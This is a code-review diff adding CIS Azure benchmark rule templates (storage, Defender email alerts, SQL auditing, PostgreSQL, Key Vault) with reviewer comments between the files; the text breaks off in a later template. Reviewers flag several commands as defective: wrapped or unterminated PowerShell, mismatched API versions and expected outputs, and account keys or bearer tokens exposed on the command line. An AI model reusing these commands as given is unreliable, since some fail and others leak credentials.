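Review bot: The remediation's PowerShell step uses `Set-AzSqlServerThreatDetectionPolicy` while the audit reads the state with `Get-AzSqlServerAdvancedThreatProtectionSetting` and checks `ThreatDetectionState`; the two come from different cmdlet generations (reference 2 points at AzureRM-era docs), so a reader on the current Az module may find the Set cmdlet missing or renamed. Worth verifying the remediation cmdlet against the Az.Sql module and, if it differs, aligning it with the audit's `AdvancedThreatProtectionSetting` family. The remediation also passes only `-EmailAdmins $True`, which does not obviously set the state the audit checks; it should name the parameter that turns `ThreatDetectionState` to `Enabled`.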
@@ -0,0 +1,38 @@
+{
+ "id": "a22a5431-1471-534c-8e7c-1e16fe0a857c",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "Additional storage costs may be incurred as snapshots are retained.",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-soft-delete\n2. https://docs.microsoft.com/en-us/azure/storage/blobs/soft-delete-container-overview\n3. https://docs.microsoft.com/en-us/azure/storage/blobs/soft-delete-container-enable?tabs=azure-portal",
+ "id": "a22a5431-1471-534c-8e7c-1e16fe0a857c",
+ "name": "Ensure Soft Delete is Enabled for Azure Containers and Blob Storage",
+ "profile_applicability": "* Level 1",
+ "description": "The Azure Storage blobs contain data like ePHI or Financial, which can be secret or personal.\nData that is erroneously modified or deleted by an application or other storage account user will cause data loss or unavailability.\n\nIt is recommended that both Azure Containers with attached Blob Storage and standalone containers with Blob Storage be made recoverable by enabling the **soft delete** configuration.\nThis is to save and recover data when blobs or blob snapshots are deleted.",
+ "rationale": "Containers and Blob Storage data can be incorrectly deleted.\nAn attacker/malicious user may do this deliberately in order to cause disruption.\nDeleting an Azure Storage blob causes immediate data loss.\nEnabling this configuration for Azure storage ensures that even if blobs/data were deleted from the storage account, Blobs/data objects are recoverable for a particular time which is set in the \"Retention policies,\" ranging from 7 days to 365 days.",
+ "audit": "**From Azure Portal:**\n\n1. From the Azure home page, open the hamburger menu in the top left or click on the arrow pointing right with 'More services' underneath.\n2. Select Storage.\n3. Select Storage Accounts.\n4. For each Storage Account, navigate to Data protection in the left scroll column.\n5. Ensure that soft delete is checked for both blobs and containers. Also check if the retention period is a sufficient length for your organization. \n\n**From Azure CLI**\n\n**Blob Storage**\nEnsure that the output of the below command contains enabled status as true and days is not empty or null\n\n```\naz storage blob service-properties delete-policy show --account-name --account-key \n```\n\n**Azure Containers**\nMake certain that the --enable-container-delete-retention is 'true'.\n```\naz storage account blob-service-properties show\n --account-name \n --account-key \n --resource-group \n```",
+ "remediation": "**From Azure Portal**\n1. From the Azure home page, open the hamburger menu in the top left or click on the arrow pointing right with 'More services' underneath.\n2. Select Storage.\n3. Select Storage Accounts.\n4. For each Storage Account, navigate to Data protection in the left scroll column.\n5. Check soft delete for both blobs and containers. Set the retention period to a sufficient length for your organization. \n\n**From Azure CLI**\n\nUpdate blob storage retention days in below command\n```\naz storage blob service-properties delete-policy update --days-retained --account-name --account-key --enable true\n```\nUpdate container retention with the below command\n```\naz storage account blob-service-properties update\n --enable-container-delete-retention true\n --container-delete-retention-days \n --account-name \n --resource-group \n --account-key \n```",
+ "section": "Storage Accounts",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 3.11",
+ "Storage Accounts"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "3.11",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_3_11"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
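Review bot: Both CLI commands in this rule pass the storage account key on the command line (`--account-key`), which leaves the key in shell history and visible to other users of the host through process listings; the text should point readers to supplying it through the `AZURE_STORAGE_KEY` environment variable, or to an Azure AD login where the command supports `--auth-mode login`, instead. The same `--account-key` usage appears in the 3.13 template's `az storage logging update` command. The audit's `az storage account blob-service-properties show` is also given `--account-key` although it is addressed by `--resource-group`/`--account-name`; worth confirming that flag is accepted there before keeping it in the instructions.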
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/b287617d-7623-5d72-923d-e79b1301e06c.json b/packages/cloud_security_posture/kibana/csp_rule_template/b287617d-7623-5d72-923d-e79b1301e06c.json
new file mode 100644
index 00000000000..d8116b5a148
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/b287617d-7623-5d72-923d-e79b1301e06c.json
@@ -0,0 +1,38 @@
+{
+ "id": "b287617d-7623-5d72-923d-e79b1301e06c",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/azure/security-center/security-center-provide-security-contact-details\n2. https://docs.microsoft.com/en-us/rest/api/securitycenter/securitycontacts/list\n3. https://docs.microsoft.com/en-us/rest/api/securitycenter/security-contacts\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-incident-response#ir-2-preparation--setup-incident-notification",
+ "id": "b287617d-7623-5d72-923d-e79b1301e06c",
+ "name": "Ensure That 'All users with the following roles' is set to 'Owner'",
+ "profile_applicability": "* Level 1",
+ "description": "Enable security alert emails to subscription owners.",
+ "rationale": "Enabling security alert emails to subscription owners ensures that they receive security alert emails from Microsoft.\nThis ensures that they are aware of any potential security issues and can mitigate the risk in a timely fashion.",
+ "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Then `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. Ensure that `All users with the following roles` is set to `Owner`\n\n**From Azure CLI**\n\nEnsure the output of below command is set to `true`.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X GET -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts?api-version=2020-01-01-preview' | jq '.|.value[] | select(.name==\"default\")'|jq '.properties.notificationsByRole'\n```",
+ "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Click on `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. In the drop down of the `All users with the following roles` field select `Owner`\n7. Click `Save`\n\n**From Azure CLI**\n\nUse the below command to set `Send email also to subscription owners` to `On`.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X PUT -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts/default1?api-version=2017-08-01-preview -d@\"input.json\"'\n```\nWhere `input.json` contains the data below, replacing `validEmailAddress` with a single email address or multiple comma-separated email addresses:\n```\n {\n \"id\": \"/subscriptions//providers/Microsoft.Security/securityContacts/default1\",\n \"name\": \"default1\",\n \"type\": \"Microsoft.Security/securityContacts\",\n \"properties\": {\n \"email\": \"\",\n \"alertNotifications\": \"On\",\n \"alertsToAdmins\": \"On\",\n \"notificationsByRole\": \"Owner\"\n }\n }\n```",
+ "section": "Microsoft Defender for Cloud",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 2.1.18",
+ "Microsoft Defender for Cloud"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "2.1.18",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_2_1_18"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
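Review bot: The CLI audit says "Ensure the output of below command is set to `true`", but the pipeline ends in `jq '.properties.notificationsByRole'`, which prints the role setting, so the value consistent with the rule name is `Owner`, not `true`; the sentence should say which value to expect. The audit also selects the contact named `default` at `api-version=2020-01-01-preview`, while the remediation PUTs to `securityContacts/default1` at `2017-08-01-preview` and the body carries `\"email\": \"\"` even though the text says to replace `validEmailAddress`, which no longer appears in the payload; contact name, API version and the email placeholder should be made consistent between the two. Both commands additionally hand the bearer token to `bash -c` as a positional argument, where it is visible in process listings; reading it from the environment or a header file (`curl -H @file`) avoids that exposure.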
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/b794635d-a338-5b4e-bfa0-75257e854c6a.json b/packages/cloud_security_posture/kibana/csp_rule_template/b794635d-a338-5b4e-bfa0-75257e854c6a.json
new file mode 100644
index 00000000000..7dac1bc50f5
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/b794635d-a338-5b4e-bfa0-75257e854c6a.json
@@ -0,0 +1,38 @@
+{
+ "id": "b794635d-a338-5b4e-bfa0-75257e854c6a",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "Being a level 2, enabling this setting can have a high impact on the cost of data storage used for logging more data per each request. Do not enable this without determining your need for this level of logging or forget to check in on data usage and projected cost.",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/rest/api/storageservices/about-storage-analytics-logging\n2. https://docs.microsoft.com/en-us/cli/azure/storage/logging?view=azure-cli-latest\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-3-enable-logging-for-security-investigation",
+ "id": "b794635d-a338-5b4e-bfa0-75257e854c6a",
+ "name": "Ensure Storage logging is Enabled for Blob Service for 'Read', 'Write', and 'Delete' requests",
+ "profile_applicability": "* Level 2",
+ "description": "The Storage Blob service provides scalable, cost-efficient object storage in the cloud.\nStorage Logging happens server-side and allows details for both successful and failed requests to be recorded in the storage account.\nThese logs allow users to see the details of read, write, and delete operations against the blobs.\nStorage Logging log entries contain the following information about individual requests: timing information such as start time, end-to-end latency, and server latency; authentication details; concurrency information; and the sizes of the request and response messages.",
+ "rationale": "Storage Analytics logs contain detailed information about successful and failed requests to a storage service.\nThis information can be used to monitor each individual request to a storage service for increased security or diagnostics.\nRequests are logged on a best-effort basis.\n\nStorage Analytics logging is not enabled by default for your storage account.",
+ "audit": "**From Azure Portal**\n\n1. From the default portal page select `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings` under the `Monitoring` section in the left column.\n4. Select the 'blob' tab indented below the storage account. Then select the diagnostic setting listed.\n5. Ensure `StorageRead`, `StorageWrite`, and `StorageDelete` options are selected under the `Logging section` and that they are sent to the correct destination.\n\n**From Azure CLI**\n\nEnsure the below command's output contains properties delete, read and write set to true.\n\n```\naz storage logging show --services b --account-name \n```",
+ "remediation": "**From Azure Portal**\n\n1. From the default portal page select `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings` under the `Monitoring` section in the left column.\n4. Select the 'blob' tab indented below the storage account. \n5. Click '+ Add diagnostic setting'.\n6. Select `StorageRead`, `StorageWrite` and `StorageDelete` options under the `Logging` section to enable Storage Logging for Blob service.\n7. Select a destination for your logs to be sent to.\n\n**From Azure CLI**\n\nUse the below command to enable the Storage Logging for Blob service.\n\n```\naz storage logging update --account-name --account-key --services b --log rwd --retention 90\n```",
+ "section": "Storage Accounts",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 3.13",
+ "Storage Accounts"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "3.13",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_3_13"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
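Review bot: The portal audit steps inspect Azure Monitor `Diagnostics settings` for `StorageRead`/`StorageWrite`/`StorageDelete`, whereas the CLI audit and remediation use `az storage logging`, which manages the classic Storage Analytics logging the rationale and reference 1 describe; the two paths appear to examine and configure different logging mechanisms, so an account that satisfies one may fail the other. The template should say which mechanism the `cis_3_13` check evaluates and keep the manual steps consistent with it. The `--retention 90` in the remediation command is also a specific choice that nothing in the text explains; one sentence on the intended retention would help readers who adapt the command.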
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/e570dc22-4f5d-51db-a193-983cb7d20afe.json b/packages/cloud_security_posture/kibana/csp_rule_template/e570dc22-4f5d-51db-a193-983cb7d20afe.json
new file mode 100644
index 00000000000..f5cd185f5c0
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/e570dc22-4f5d-51db-a193-983cb7d20afe.json
@@ -0,0 +1,38 @@
+{
+ "id": "e570dc22-4f5d-51db-a193-983cb7d20afe",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/azure/security-center/security-center-enable-auditing-on-sql-servers\n2. https://docs.microsoft.com/en-us/powershell/module/azurerm.sql/get-azurermsqlserverauditing?view=azurermps-5.2.0\n3. https://docs.microsoft.com/en-us/powershell/module/azurerm.sql/set-azurermsqlserverauditingpolicy?view=azurermps-5.2.0\n4. https://docs.microsoft.com/en-us/azure/sql-database/sql-database-auditing\n5. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-3-enable-logging-for-security-investigation",
+ "id": "e570dc22-4f5d-51db-a193-983cb7d20afe",
+ "name": "Ensure that 'Auditing' is set to 'On'",
+ "profile_applicability": "* Level 1",
+ "description": "Enable auditing on SQL Servers.",
+ "rationale": "The Azure platform allows a SQL server to be created as a service.\nEnabling auditing at the server level ensures that all existing and newly created databases on the SQL server instance are audited.\n\nAuditing policy applied on the SQL database does not override auditing policy and settings applied on the particular SQL server where the database is hosted.\n\nAuditing tracks database events and writes them to an audit log in the Azure storage account.\nIt also helps to maintain regulatory compliance, understand database activity, and gain insight into discrepancies and anomalies that could indicate business concerns or suspected security violations.",
+ "audit": "**From Azure Portal**\n\n1. Go to `SQL servers`\n2. For each server instance\n3. Click on `Auditing`\n4. Ensure that `Enable Azure SQL Auditing` is set to `On`\n\n**From PowerShell**\n\nGet the list of all SQL Servers\n\n```\nGet-AzSqlServer\n```\n\nFor each Server\n\n```\nGet-AzSqlServerAudit -ResourceGroupName -ServerName \n```\n\nEnsure that `BlobStorageTargetState`, `EventHubTargetState`, or `LogAnalyticsTargetState` is set to `Enabled`.",
+ "remediation": "**From Azure Portal**\n\n1. Go to `SQL servers`\n2. Select the SQL server instance\n3. Under `Security`, click `Auditing`\n4. Click the toggle next to `Enable Azure SQL Auditing`\n5. Select an Audit log destination\n6. Click `Save`\n\n**From PowerShell**\n\nGet the list of all SQL Servers\n\n```\nGet-AzSqlServer\n```\n\nFor each Server, enable auditing and set the retention for at least 90 days.\n\n**Log Analytics Example**\n```\nSet-AzSqlServerAudit -ResourceGroupName -ServerName -RetentionInDays -LogAnalyticsTargetState Enabled -WorkspaceResourceId \"/subscriptions//resourceGroups/insights-integration/providers/Microsoft.OperationalInsights/workspaces/\n```\n\n**Event Hub Example**\n\n```\nSet-AzSqlServerAudit -ResourceGroupName \"\" -ServerName \"\" -EventHubTargetState Enabled -EventHubName \n \"\" -EventHubAuthorizationRuleResourceId \"\"\n```\n\n**Blob Storage Example***\n\n```\nSet-AzSqlServerAudit -ResourceGroupName \"\" -ServerName \"\" -BlobStorageTargetState Enabled \n -StorageAccountResourceId \"/subscriptions//resourceGroups//providers/Microsoft.Stora\n ge/storageAccounts/\"\n```",
+ "section": "SQL Server - Auditing",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 4.1.1",
+ "SQL Server - Auditing"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "4.1.1",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_4_1_1"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
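Review bot: The PowerShell examples in the remediation carry line-wrap artefacts that make them fail when pasted: the Blob Storage example splits the provider name across lines (`Microsoft.Stora\n ge/storageAccounts/`) and the Event Hub example separates `-EventHubName` from its value (`-EventHubName \n \"\"`). Those strings should be rejoined onto one line each, the unterminated `-WorkspaceResourceId \"/subscriptions//...` quote in the Log Analytics example closed, and the stray asterisk in `**Blob Storage Example***` dropped. The Event Hub and Blob Storage examples also omit `-RetentionInDays` even though the preceding sentence asks for retention of at least 90 days; only the Log Analytics example carries it.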
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/eb9e71ae-113b-5631-9e5c-b7fdc0b0666e.json b/packages/cloud_security_posture/kibana/csp_rule_template/eb9e71ae-113b-5631-9e5c-b7fdc0b0666e.json
new file mode 100644
index 00000000000..cc48ee426f9
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/eb9e71ae-113b-5631-9e5c-b7fdc0b0666e.json
@@ -0,0 +1,38 @@
+{
+ "id": "eb9e71ae-113b-5631-9e5c-b7fdc0b0666e",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/azure/postgresql/concepts-firewall-rules\n2. https://docs.microsoft.com/en-us/azure/postgresql/howto-manage-firewall-using-cli\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-network-security#ns-1-establish-network-segmentation-boundaries\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-network-security#ns-6-deploy-web-application-firewall",
+ "id": "eb9e71ae-113b-5631-9e5c-b7fdc0b0666e",
+ "name": "Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled",
+ "profile_applicability": "* Level 1",
+ "description": "Disable access from Azure services to PostgreSQL Database Server.",
+ "rationale": "If access from Azure services is enabled, the server's firewall will accept connections from all Azure resources, including resources not in your subscription.\nThis is usually not a desired configuration.\nInstead, set up firewall rules to allow access from specific network ranges or VNET rules to allow access from specific virtual networks.",
+ "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Connection security`.\n4. Under `Firewall rules`, ensure `Allow access to Azure services` is set to `No`.\n\n**From Azure CLI**\n\nEnsure the output of the below command does not include a rule with the name AllowAllWindowsAzureIps or \"startIpAddress\": \"0.0.0.0\" & \"endIpAddress\": \"0.0.0.0\",\n```\naz postgres server firewall-rule list --resource-group --server \n```",
+ "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Connection security`.\n4. Under `Firewall rules`, set `Allow access to Azure services` to `No`.\n5. Click `Save`.\n\n**From Azure CLI**\n\nUse the below command to delete the AllowAllWindowsAzureIps rule for PostgreSQL Database.\n```\naz postgres server firewall-rule delete --name AllowAllWindowsAzureIps --resource-group --server-name \n```",
+ "section": "PostgreSQL Database Server",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 4.3.7",
+ "PostgreSQL Database Server"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "4.3.7",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_4_3_7"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/ede1488a-e8cd-5d5f-a25d-96c136695594.json b/packages/cloud_security_posture/kibana/csp_rule_template/ede1488a-e8cd-5d5f-a25d-96c136695594.json
new file mode 100644
index 00000000000..ab5c39f57a9
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/ede1488a-e8cd-5d5f-a25d-96c136695594.json
@@ -0,0 +1,38 @@
+{
+ "id": "ede1488a-e8cd-5d5f-a25d-96c136695594",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/rest/api/postgresql/configurations/listbyserver\n2. https://docs.microsoft.com/en-us/azure/postgresql/howto-configure-server-parameters-using-portal\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-3-enable-logging-for-security-investigation\n4. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/get-azpostgresqlconfiguration?view=azps-9.2.0#example-2-get-specified-postgresql-configuration-by-name\n5. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/update-azpostgresqlconfiguration?view=azps-9.2.0#example-1-update-postgresql-configuration-by-name",
+ "id": "ede1488a-e8cd-5d5f-a25d-96c136695594",
+ "name": "Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server",
+ "profile_applicability": "* Level 1",
+ "description": "Enable `log_connections` on `PostgreSQL Servers`.",
+ "rationale": "Enabling `log_connections` helps PostgreSQL Database to log attempted connection to the server, as well as successful completion of client authentication.\nLog data can be used to identify, troubleshoot, and repair configuration errors and suboptimal performance.",
+ "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_connections`.\n5. Ensure that value is set to `ON`.\n\n**From Azure CLI**\n\nEnsure `log_connections` value is set to `ON`\n```\naz postgres server configuration show --resource-group --server-name --name log_connections\n```\n\n**From PowerShell**\n\nEnsure `log_connections` value is set to `ON`\n\n```\nGet-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_connections\n```",
+ "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `log_connections`.\n5. Click `ON` and save.\n\n**From Azure CLI**\n\nUse the below command to update `log_connections` configuration.\n```\naz postgres server configuration set --resource-group --server-name --name log_connections --value on\n```\n\n**From PowerShell**\n\nUse the below command to update `log_connections` configuration.\n```\nUpdate-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_connections -Value on\n```",
+ "section": "PostgreSQL Database Server",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 4.3.3",
+ "PostgreSQL Database Server"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "4.3.3",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_4_3_3"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/f5f029ea-d16e-5661-bc66-3096aaeda2f3.json b/packages/cloud_security_posture/kibana/csp_rule_template/f5f029ea-d16e-5661-bc66-3096aaeda2f3.json
new file mode 100644
index 00000000000..0a13404b10d
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/f5f029ea-d16e-5661-bc66-3096aaeda2f3.json
@@ -0,0 +1,38 @@
+{
+ "id": "f5f029ea-d16e-5661-bc66-3096aaeda2f3",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "Secrets cannot be used beyond their assigned expiry date respectively. Secrets need to be rotated periodically wherever they are used.",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/azure/key-vault/key-vault-whatis\n2. https://docs.microsoft.com/en-us/rest/api/keyvault/about-keys--secrets-and-certificates#key-vault-secrets\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-6-use-a-secure-key-management-process\n4. https://docs.microsoft.com/en-us/powershell/module/az.keyvault/set-azkeyvaultsecret?view=azps-7.4.0",
+ "id": "f5f029ea-d16e-5661-bc66-3096aaeda2f3",
+ "name": "Ensure that the Expiration Date is set for all Secrets in Non-RBAC Key Vaults",
+ "profile_applicability": "* Level 1",
+ "description": "Ensure that all Secrets in Non Role Based Access Control (RBAC) Azure Key Vaults have an expiration date set.",
+ "rationale": "The Azure Key Vault enables users to store and keep secrets within the Microsoft Azure environment.\nSecrets in the Azure Key Vault are octet sequences with a maximum size of 25k bytes each.\nThe `exp` (expiration date) attribute identifies the expiration date on or after which the secret MUST NOT be used.\nBy default, secrets never expire.\nIt is thus recommended to rotate secrets in the key vault and set an explicit expiration date for all secrets.\nThis ensures that the secrets cannot be used beyond their assigned lifetimes.",
+ "audit": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Secrets`.\n3. In the main pane, ensure that the status of the secret is `Enabled`.\n4. Set an appropriate `Expiration date` on all secrets.\n\n**From Azure CLI:**\n\nGet a list of all the key vaults in your Azure environment by running the following command:\n\n```\naz keyvault list\n```\n\nFor each key vault, ensure that the output of the below command contains ID (id), enabled status as `true` and Expiration date (expires) is not empty or null:\n\n```\naz keyvault secret list --vault-name --query '[*].{\"kid\":kid,\"enabled\":attributes.enabled,\"expires\":attributes.expires}'\n```\n\n**From PowerShell:**\n\nRetrieve a list of Key vaults:\n\n```\nGet-AzKeyVault\n```\n\nFor each Key vault run the following command to determine which vaults are configured to use RBAC:\n\n```\nGet-AzKeyVault -VaultName \n```\n\nFor each Key Vault with the `EnableRbacAuthorization` setting set to `False` or empty, run the following command.\n\n```\nGet-AzKeyVaultSecret -VaultName \n```\n\nMake sure the `Expires` setting is configured with a value as appropriate wherever the `Enabled` setting is set to `True`.",
+ "remediation": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Secrets`.\n3. In the main pane, ensure that the status of the secret is `Enabled`.\n4. Set an appropriate `Expiration date` on all secrets.\n\n**From Azure CLI:**\n\nUpdate the `Expiration date` for the secret using the below command:\n\n```\naz keyvault secret set-attributes --name --vault-name --expires Y-m-d'T'H:M:S'Z'\n```\n\nNote:\nTo view the expiration date on all secrets in a Key Vault using Microsoft API, the `List` Key permission is required.\n\nTo update the expiration date for the secrets:\n5. Go to Key vault, click on `Access policies`.\n6. Click on `Create` and add an access policy with the `Update` permission (in the Secret Permissions - Secret Management Operations section).\n\n**From PowerShell:**\n\nFor each Key vault with the `EnableRbacAuthorization` setting set to `False` or empty, run the following command.\n\n```\nSet-AzKeyVaultSecret -VaultName -Name -Expires \n```",
+ "section": "Key Vault",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 8.4",
+ "Key Vault"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "8.4",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_8_4"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/f6cfd4ce-1b96-5871-aa9d-8dba2d701579.json b/packages/cloud_security_posture/kibana/csp_rule_template/f6cfd4ce-1b96-5871-aa9d-8dba2d701579.json
new file mode 100644
index 00000000000..160c46dbf35
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/f6cfd4ce-1b96-5871-aa9d-8dba2d701579.json
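Review bot: The audit section's portal step 4 (`Set an appropriate `Expiration date` on all secrets.`) is a remediation action rather than a check; in the audit it should read as a verification, e.g. `Ensure an `Expiration date` is set on every secret whose status is `Enabled`.`. The CLI audit says the output should contain the ID (`id`), but the JMESPath query projects `kid`, which is a different field from `id`; projecting `id` would match the sentence, and the placeholder after `--vault-name` is missing as in the other templates. In the remediation the numbering resumes at `5.`/`6.` after a note, and those two steps grant the `Update` secret permission, which is a prerequisite for the earlier steps rather than a continuation of them; the steps should be reordered so they read in sequence.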
@@ -0,0 +1,38 @@ +{ + "id": "f6cfd4ce-1b96-5871-aa9d-8dba2d701579", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Once TDE protector is encrypted with a Customer-managed key, it transfers entire responsibility of respective key management on to you, and hence you should be more careful about doing any operations on the particular key in order to keep data from corresponding SQL server and Databases hosted accessible.\n\nWhen deploying Customer Managed Keys, it is prudent to ensure that you also deploy an automated toolset for managing these keys (this should include discovery and key rotation), and Keys should be stored in an HSM or hardware backed keystore, such as Azure Key Vault.\n\nAs far as toolsets go, check with your cryptographic key provider, as they may well provide one as an add-on to their service.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/sql/relational-databases/security/encryption/transparent-data-encryption-byok-azure-sql\n2. https://azure.microsoft.com/en-in/blog/preview-sql-transparent-data-encryption-tde-with-bring-your-own-key-support/\n3. https://winterdom.com/2017/09/07/azure-sql-tde-protector-keyvault\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-5-use-customer-managed-key-option-in-data-at-rest-encryption-when-required\n5. https://docs.microsoft.com/en-us/azure/key-vault/general/basic-concepts\n6. https://docs.microsoft.com/en-us/cli/azure/sql/server/tde-key?view=azure-cli-latest\n7. https://learn.microsoft.com/en-us/powershell/module/az.sql/get-azsqlservertransparentdataencryptionprotector?view=azps-9.2.0\n8. 
